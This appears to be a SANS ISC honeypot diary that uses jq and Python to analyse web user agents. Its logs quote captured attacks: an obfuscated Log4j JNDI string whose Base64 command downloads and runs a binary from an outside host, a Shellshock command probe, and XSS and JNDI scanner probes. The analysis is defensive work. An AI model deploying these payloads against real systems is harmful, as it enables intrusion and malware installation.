What is that User Agent?
Devices connect to web resources on a regular basis. One way to identify what is connecting to a web resource is through its user agent [1], and DShield [2] honeypots receive many of them.
Figure 1: Popular user agents seen over the last 7 days from a honeypot
Some of these user agents are easier to understand than others. They can indicate the version of software used to connect to the web resource and, as seen in the example above, indicate access attempts from researchers.
Translating User Agent Strings
There are many resources that translate user agent strings into human-readable information. Many allow for manual submission, but to save some time and effort, I wanted to automate this process. I decided to use the WhatIsMyBrowser API [3] to gather data on the user agents collected by one of my honeypots. First, I needed to export the user agents seen by my honeypot, and 'jq' was the tool I decided to use for a quick text export.
# read all web honeypot logs from my archival location
# default storage location for these logs is /srv/db/ on a DShield honeypot
# cat /logs/webhoneypot*.json
# select any user agent values where the value is not blank
# jq -r 'select(.useragent!="")'
# get raw user agent values (without quotes) and output to a text file
# jq -r .useragent[] > all_user_agents_historic.txt
cat /logs/webhoneypot*.json | jq -r 'select(.useragent!="")' | jq -r .useragent[] > all_user_agents_historic.txt
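The same export can be sketched in Python for anyone who prefers to stay in one language. This is a minimal sketch, not part of my original workflow: it assumes each log line is a standalone JSON object and that `useragent` is either a list of strings or an empty string, which is what the jq filters above imply. The function name `extract_user_agents` and the sample records are made up for illustration.

```python
import json


def extract_user_agents(lines):
    """Yield each non-empty user agent found in JSON-lines log records."""
    for line in lines:
        line = line.strip()
        if not line:
            continue
        try:
            record = json.loads(line)
        except json.JSONDecodeError:
            continue  # skip truncated or malformed lines
        if not isinstance(record, dict):
            continue
        agents = record.get("useragent", "")
        # Assumption: the field is a list of strings, or "" when absent.
        if isinstance(agents, str):
            agents = [agents] if agents else []
        for agent in agents:
            if agent:
                yield agent


# Hypothetical sample records (documentation IP range), not honeypot data.
sample = [
    '{"sip": "192.0.2.10", "useragent": ["curl/7.55.1"]}',
    '{"sip": "192.0.2.11", "useragent": ""}',
    '{"sip": "192.0.2.12", "useragent": ["Go-http-client/1.1"]}',
]
print(list(extract_user_agents(sample)))
```

To run this against real logs, the lines could be read from the files matching /logs/webhoneypot*.json and the results written out one per line.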
Now that I have all my user agents, I put together a short Python script to process the data.
import json
from collections import Counter

import requests


def get_user_agents(file):
    # Return every user agent seen (for counting) and the unique set (for API lookups)
    unique_user_agents = set()
    all_headers = []
    with open(file, "r") as filehandle:
        for line in filehandle:
            user_agent = line.replace("\n", "")
            unique_user_agents.add(user_agent)
            all_headers.append(user_agent)
    return all_headers, unique_user_agents


def get_post_data(user_agent):
    # Build the header list submitted to the API for a single user agent
    header = []
    header.append({
        "name": "USER_AGENT",
        "value": user_agent,
    })
    return header


def request_user_agent_data(header):
    headers = {
        'X-API-KEY': "<redacted>",
    }
    post_data = {
        "headers": header,
    }
    result = requests.post("https://api.whatismybrowser.com/api/v3/detect", data=json.dumps(post_data), headers=headers)
    # Keep the raw response for every request
    save_results(result.text, "results.json")
    try:
        save_results(
            str(header_counts[header[0]["value"]]) + "|" +
            result.json().get("detection").get("simple_software_string") + "|" +
            header[0]["value"], "basic_results.csv"
        )
    except Exception:
        # No usable detection in the response; record the user agent as unmatched
        save_results(
            str(header_counts[header[0]["value"]]) + "|" +
            "No results found" + "|" +
            header[0]["value"], "basic_results.csv"
        )


def save_results(result, filename):
    # Append one line to the given output file
    with open(filename, "a") as filehandle:
        filehandle.write(result + "\n")


def process_headers(header_list):
    for each_header in header_list:
        request_user_agent_data(get_post_data(each_header))


all_headers, headers_to_send = get_user_agents("all_user_agents_historic.txt")
header_counts = Counter(all_headers)
process_headers(headers_to_send)
Some of this was based on the example code in the API documentation [4]. I ran into some issues submitting all of the headers in one request. Instead, the script submits each unique user agent one at a time and saves the results to a couple of files:
- basic_results.csv --> Bar ("|") delimited text file containing number of times the user agent was seen, translated user agent, raw user agent
- results.json --> raw results from every request
There are definitely some efficiencies to be made with the code, but it gave me what I was looking for.
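The bar-delimited file is easy to load back for ranking. The following is a rough sketch of one way to do it, assuming the three-field layout described above (count, translated user agent, raw user agent). The helper names `parse_result_line` and `rank_results` are my own for illustration, and the sample rows reuse values from the results shown later in this post.

```python
def parse_result_line(line):
    """Split one 'count|translated|raw' line into its three fields."""
    # maxsplit=2 keeps any "|" characters inside the raw user agent intact.
    # Assumption: the translated string itself never contains "|".
    count, translated, raw = line.rstrip("\n").split("|", 2)
    return int(count), translated, raw


def rank_results(lines, top_n=10):
    """Return the top_n most common and top_n least common rows by count."""
    rows = [parse_result_line(line) for line in lines if line.strip()]
    rows.sort(key=lambda row: row[0], reverse=True)
    return rows[:top_n], rows[-top_n:]


sample = [
    "134014|Go Http Client 1.1|Go-http-client/1.1\n",
    "2303996|Firefox 22 on Windows 7|Mozilla/5.0 (Windows NT 6.1; WOW64; rv:22.0) Gecko/20100101 Firefox/22.0\n",
    "112378|ZGrab 0.x|Mozilla/5.0 zgrab/0.x\n",
]
most, least = rank_results(sample, top_n=2)
for count, translated, raw in most:
    print(count, translated)
```

Splitting with a maximum of two separators matters here because attack strings submitted as user agents can contain almost any character, including the delimiter.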
User Agents Seen on a DShield Honeypot
Before going into some of the specific user agents, some information about the data used:
Time period of data | 8/3/2023 - 1/5/2024 (approximately 5 months of data) |
Number of user agent strings | 7,540,306 |
Number of unique user agent strings | 1,181 |
Figure 2: Summary of data used for analysis
Most Common User Agents
Count | Translated User Agent | Raw User Agent |
---|---|---|
2303996 | Firefox 22 on Windows 7 | Mozilla/5.0 (Windows NT 6.1; WOW64; rv:22.0) Gecko/20100101 Firefox/22.0 |
1702751 | Firefox 93 on Windows 10 | Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0 |
250183 | Chrome 81 on Linux | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
170996 | Chrome 117 on Windows 10 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 |
157401 | Internet Explorer 7 on Windows Vista | Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 6.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727) |
138207 | Firefox 60 on Windows 10 | Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0 |
134014 | Go Http Client 1.1 | Go-http-client/1.1 |
121178 | Chrome 109 on Windows 10 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 |
112378 | ZGrab 0.x | Mozilla/5.0 zgrab/0.x |
110627 | Chrome 116 on Windows 10 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 |
Figure 3: Top 10 most common user agents seen on a DShield honeypot
The "translated user agent" is much easier to understand. The most popular user agent seen is Firefox 22 on Windows 7. Windows 7 support ended in January of 2020 and Firefox 22 was released in 2013. This is either a very old, outdated device that may also be compromised, or a falsified user agent string. To better understand which hosts are using this specific user agent string, I can take a look at the raw data.
The data used for this search was only the last 7 days.
# read web honeypot json files
# cat /logs/webhoneypot*.json
# search for values that do not have a blank user agent
# jq -r 'select(.useragent!="")'
# search for our specific user agent string (Windows 7, Firefox 22)
# jq -r 'select(.useragent[]=="Mozilla/5.0 (Windows NT 6.1; WOW64; rv:22.0) Gecko/20100101 Firefox/22.0")'
# output the source IPs, sorted by the number of times the source IP was seen
# jq -r .sip | sort | uniq -c | sort -n
cat /logs/webhoneypot*.json | jq -r 'select(.useragent!="")' | jq -r 'select(.useragent[]=="Mozilla/5.0 (Windows NT 6.1; WOW64; rv:22.0) Gecko/20100101 Firefox/22.0")' | jq -r .sip | sort | uniq -c | sort -n
831351 80.243.171.172
This user agent has only been coming from 80.243.171.172 in the last week. Are there any other user agents that this particular IP is using?
cat /logs/webhoneypot*.json | jq -r 'select(.useragent!="")' | jq 'select(.sip=="80.243.171.172")' | jq -r .useragent[] | sort | uniq -c | sort -n
2 QualysGuard
116 Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.18) Gecko/2010020220 Firefox/3.0.18 (.NET CLR 3.5.30729);
185 ${jndi:nis://10.10.11.42:42643/QUALYSTEST}
207 ZX-80 SPECTRUM
263 ${jndi:corba://10.10.11.42:35625/QUALYSTEST}
439 ${jndi:http://10.10.11.42:43608/QUALYSTEST}
457 Java/1.8.0_102
496 Java/1.8.0_161
528 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
769 Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
892 curl/7.55.1
964 ${jndi:ldap://10.10.11.42:37161/QUALYSTEST}
1017 ${jndi:ldaps://10.10.11.42:33141/QUALYSTEST}
1069 ${jndi:nds://10.10.11.42:43608/QUALYSTEST}
1105 ${jndi:ldaps://10.10.11.42:42091/QUALYSTEST}
1368 ${jndi:dns://10.10.11.42:42643/QUALYSTEST}
1500 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
1525 ${jndi:iiop://10.10.11.42:35625/QUALYSTEST}
1669 ${jndi:rmi://10.10.11.42:42091/QUALYSTEST}
1791 ${jndi:nis://10.10.11.42:45742/QUALYSTEST}
2653 ${jndi:rmi://10.10.11.42:33141/QUALYSTEST}
2794 Mozilla/5.0 (Windows NT 6.1; WOW64; rv:22.0) Gecko/20100101
3062 ${jndi:dns://10.10.11.42:45742/QUALYSTEST}
3253 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.199 Safari/537.36
3305 Node.js
3642 Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
3805 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
3862 : Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
3875 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
3889 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0
4115 Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
4374 Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.117 Safari/537.36
4467 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
4475 Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
4596 Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
4615 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0
4625 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:53.0) Gecko/20100101 Firefox/53.0
4868 Gecko/20100914
4894 Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.16) Gecko/20110319 Firefox/3.6.16
5036 Mozilla/5.0 (Windows NT 6.1; rv:60.0) Gecko/20100101 Firefox/60.0
5222 () { ignored; }; echo Content-Type: text/plain ; echo ; echo ; /usr/bin/id
5612 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0
6442 curl/7.29.0
6652 gSOAP/2.8
6729 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:66.0) Gecko/20100101 Firefox/66.0
7534 Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14)
7721 Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
8052 Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
8073 Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
8230 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101
8644 curl/7.60.0
8649 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
8819 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0
9145 Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
9326 Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0
9853 Mozilla/5.0
10708 <script>alert(Qualys)</script>
12703 curl/7.47.0
13541 Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:46.0) Gecko/20100101 Firefox/46.0
13746 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0
15824 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0
17642 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:59.0) Gecko/20100101 Firefox/59.0
18622 Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0
19283 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
19708 Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.18) Gecko/2010020220 Firefox/3.0.18 (.NET CLR 3.5.30729)
22817 Mozilla/5.0 (Windows NT 10.0; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0
32794 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
39371 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.1.4322)
40764 Mozilla/5.0 (X11; Linux i686; rv:52.0) Gecko/20100101 Firefox/52.0
74931 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
93445 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0
831351 Mozilla/5.0 (Windows NT 6.1; WOW64; rv:22.0) Gecko/20100101 Firefox/22.0
864153 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0
Based on the data, it looks like this might be a Qualys scan [5]. Using different user agent strings to access web resources can be particularly helpful for identifying vulnerabilities and working around security controls. For example, some websites may block access to their resources when an automated tool like curl is used. However, this can be easily circumvented by changing the user agent [6].
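The two jq pivots above (source IPs for one user agent, then user agents for one source IP) can also be sketched in Python with a single helper. This is only an illustration: it assumes records have already been parsed into dictionaries with `sip` and `useragent` fields, and the `pivot` and `as_list` names and the sample records are hypothetical.

```python
from collections import Counter


def as_list(value):
    """Normalize a field that may be a string or a list of strings."""
    if isinstance(value, list):
        return value
    return [value] if value else []


def pivot(records, match_key, match_value, count_key):
    """Count count_key values over records whose match_key contains match_value."""
    counts = Counter()
    for record in records:
        if match_value in as_list(record.get(match_key, "")):
            counts.update(as_list(record.get(count_key, "")))
    return counts


# Made-up records using documentation IP ranges, not honeypot data.
records = [
    {"sip": "192.0.2.10", "useragent": ["curl/7.55.1"]},
    {"sip": "192.0.2.10", "useragent": ["Node.js"]},
    {"sip": "192.0.2.10", "useragent": ["curl/7.55.1"]},
    {"sip": "198.51.100.7", "useragent": ["curl/7.55.1"]},
]

# Which source IPs sent this user agent?
print(pivot(records, "useragent", "curl/7.55.1", "sip").most_common())
# Which user agents did this source IP send?
print(pivot(records, "sip", "192.0.2.10", "useragent").most_common())
```

Unlike the jq pipeline, this counts a record once even if the matching value appears more than once in its list.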
Least Common User Agents
Count | Translated User Agent | Raw User Agent |
---|---|---|
1 | Chrome 92 on Android 11 | Mozilla/5.0 (Linux; Android 11; ONEPLUS A6000) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Mobile Safari/537.36 |
1 | Chrome 56 on Windows 8 | Mozilla/5.0 (Windows NT 6.2;en-US) AppleWebKit/537.32.36 (KHTML, live Gecko) Chrome/56.0.3037.63 Safari/537.32 |
1 | Safari 10 on Mac OS X (Yosemite) | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/600.8.9 (KHTML, like Gecko) Version/10.0 Safari/602.1.50 |
1 | Chromium 75 on Ubuntu Linux | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/75.0.3770.142 Chrome/75.0.3770.142 Safari/537.36 |
1 | Chrome 72 on Windows 10 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.81 Safari/537.36 |
1 | No results found | t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//193.111.248[.]104:2213/TomcatBypass/Command/Base64 /d2dldCAtTyAvdG1wL3BhcmFpc28ueDg2IGh0dHA6Ly91cGRhdGUuZXRlcm5pdHlzdHJlc3Nlci54eXovZG93bmxvYWQvYmlu cy9wYXJhaXNvLng4NiA7IGN1cmwgLW8gL3RtcC9wYXJhaXNvLng4NiBodHRwOi8vdXBkYXRlLmV0ZXJuaXR5c3RyZXNzZXIue Hl6L2Rvd25sb2FkL2JpbnMvcGFyYWlzby54ODYgOyBjaG1vZCAreCAvdG1wL3BhcmFpc28ueDg2IDsgY2htb2QgNzc3IC90bX AvcGFyYWlzby54ODYgOyAvdG1wL3BhcmFpc28ueDg2IHg4NiA7IHJtIC1yZiAvdG1wL3BhcmFpc28ueDg2}') |
1 | Edge 118 on Android 11 | Mozilla/5.0 (Linux; Android 11; Pixel 5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.4430.91 Mobile Safari/537.36 Edg/118.0.0.0 |
1 | Chrome 101 on Windows 10 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.67 Safari/537.36 |
1 | Chrome 19 on iOS 5.1 | Mozilla/5.0 (iPhone; U; CPU iPhone OS 5_1_1 like Mac OS X; da-dk) AppleWebKit/534.46.0 (KHTML, like Gecko) CriOS/19.0.1084.60 Mobile/9B206 Safari/7534.48.3 |
1 | Android Browser 3.1 on Android (Cupcake) | HTC_Dream Mozilla/5.0 (Linux; U; Android 1.5; en-ca; Build/CUPCAKE) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 |
Figure 4: Top 10 least common user agents seen on a DShield honeypot
These results include one user agent that was not found through the API and was listed as "No results found". This looks like a Log4j attack, attempting to retrieve a payload through 193.111.248[.]104 on port 2213. Any items that did not have a result could be a good place to look for customized user agents and attacks.
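Strings like the one in the table above carry a Base64-encoded command after a "/Command/Base64/" path segment, and decoding it is a quick way to see what the attacker wanted to run. The sketch below is a minimal example under that assumption; the `decode_embedded_command` name is mine, other tooling may use different markers, and the sample string is built from a harmless command and a documentation IP address.

```python
import base64
import binascii
import re

# Assumption: the encoded command follows a "/Command/Base64/" path segment.
# Whitespace is tolerated because log exports sometimes wrap long strings.
MARKER = re.compile(r"/Command/Base64\s*/\s*([A-Za-z0-9+/=\s]+)")


def decode_embedded_command(user_agent):
    """Return the decoded command from a '/Command/Base64/<data>' string, or None."""
    match = MARKER.search(user_agent)
    if not match:
        return None
    payload = "".join(match.group(1).split())  # drop whitespace from wrapping
    payload += "=" * (-len(payload) % 4)       # restore any stripped padding
    try:
        decoded = base64.b64decode(payload, validate=True)
    except (binascii.Error, ValueError):
        return None
    return decoded.decode("utf-8", errors="replace")


# Harmless stand-in for a real payload.
harmless = base64.b64encode(b"echo hello").decode("ascii")
sample = "${jndi:ldap://192.0.2.1:1389/TomcatBypass/Command/Base64/" + harmless + "}"
print(decode_embedded_command(sample))
```

The decoded text should only ever be read, never executed.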
User Agents Not Found
Count | Translated User Agent | Raw User Agent |
---|---|---|
53175 | No results found | 'Cloud mapping experiment. Contact research@pdrlabs.net' |
38409 | No results found | Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com |
15048 | No results found | gSOAP/2.8 |
14492 | No results found | <script>alert(Qualys)</script> |
12540 | No results found | Hello World |
9009 | No results found | () { ignored; }; echo Content-Type: text/plain ; echo ; echo ; /usr/bin/id |
6929 | No results found | Gecko/20100914 |
5170 | No results found | Node.js |
4612 | No results found | Sun Web Console Fingerprinter/7.15 |
3062 | No results found | ${jndi:dns://10.10.11.42:45742/QUALYSTEST} |
Figure 5: Top 10 most common user agents without a translated match, seen on a DShield honeypot
There are indications of research scans, vulnerability scans, web attacks and perhaps some user agents that simply aren't defined yet in the resource that was used. Taking out any of the Log4j attacks and a couple of derogatory items, these were the user agents without any results found:
- <script>alert(Qualys)</script>
- A
- Abcd
- abuse.xmco[.]fr
- Adobe Application Manager 2.0
- asusrouter--
- 'Cloud mapping experiment. Contact research@pdrlabs[.]net'
- Dark
- DoCoMo/2.0 SH901iC(c100;TB;W24H12)
- Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks[.]com
- fasthttp
- Gecko/20100914
- gSOAP/2.8
- hacked-by-matrix
- Hello World
- Hello World/1.0
- Hello, world
- Hello, World
- https://aff[.]rip/?affiliate_id=9345&keyword=tech+discord+server
- https://affgate[.]top/landing/aff/
- https://discordservers[.]su/
- Kryptos Logic Telltale - telltale.kryptoslogic[.]com
- l9tcpid/v1.1.0
- masscan/1.0 (https://github[.]com/robertdavidgraham/masscan)
- masscan/1.3 (https://github[.]com/robertdavidgraham/masscan)
- masscan-ng/1.3 (https://github[.]com/bi-zone/masscan-ng)
- Microsoft URL Control - 6.00.8862
- MOT-L7v/08.B7.5DR MIB/2.2.1 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Link/6.3.0.0.0
- Mozila/5.0
- nekololis-owned-you
- Node.js
- NukeBotC2
- Offline Explorer/2.5
- pOrT.sCaNnInG.iS.nOt.A.cRiMe
- QualysGuard
- r00ts3c-owned-you
- SEC-SGHX210/1.0 UP.Link/6.3.1.13.0
- Sun Web Console Fingerprinter/7.15
- t.me/DeltaApi
- the beast
- WDG_Validator/1.6.2
- WebCopier v4.6
- webprosbot/2.0 (+mailto:abuse-6337@webpros[.]com)
- WebZIP/3.5 (http://www.spidersoft[.]com)
- Xenu Link Sleuth/1.3.8
- xfa1
- ZX-80 SPECTRUM
Any of these user agents would be interesting to look into in more depth. Understanding the user agent strings accessing web resources can help to uncover suspicious activity. In addition, understanding the user agents coming from your network can also help uncover applications that reside on devices and the devices themselves.
Figure 6: User agents identifying a Roku TV
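As a rough way to triage unmatched strings like the ones listed above, a few regular expressions can separate exploit attempts from scanner banners. This is a sketch only: the patterns and labels are illustrative choices of mine based on strings seen in this data, not a complete or authoritative detection list.

```python
import re

# Illustrative patterns only, based on strings that appear in the tables above.
PATTERNS = [
    ("log4j-lookup", re.compile(r"\$\{")),
    ("shellshock", re.compile(r"\(\)\s*\{")),
    ("xss-probe", re.compile(r"<script", re.IGNORECASE)),
    ("scanner-or-tool", re.compile(r"masscan|zgrab|qualys|curl/|go-http-client", re.IGNORECASE)),
]


def triage(user_agent):
    """Return the labels of every pattern that matches the user agent."""
    return [label for label, pattern in PATTERNS if pattern.search(user_agent)]


for agent in [
    "${jndi:ldap://10.10.11.42:37161/QUALYSTEST}",
    "() { ignored; }; echo Content-Type: text/plain ; echo ; echo ; /usr/bin/id",
    "<script>alert(Qualys)</script>",
    "Hello World",
]:
    print(triage(agent), agent)
```

Anything that returns an empty list still deserves a manual look, since custom strings such as "Hello World" match none of these patterns.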
[1] https://en.wikipedia.org/wiki/User_agent
[2] https://isc.sans.edu/honeypot.html
[3] https://developers.whatismybrowser.com/api/
[4] https://developers.whatismybrowser.com/api/docs/v3/sample-code/python/detect/
[5] https://www.qualys.com/apps/web-app-scanning/
[6] https://phoenixnap.com/kb/curl-user-agent
--
Jesse La Grew
Handler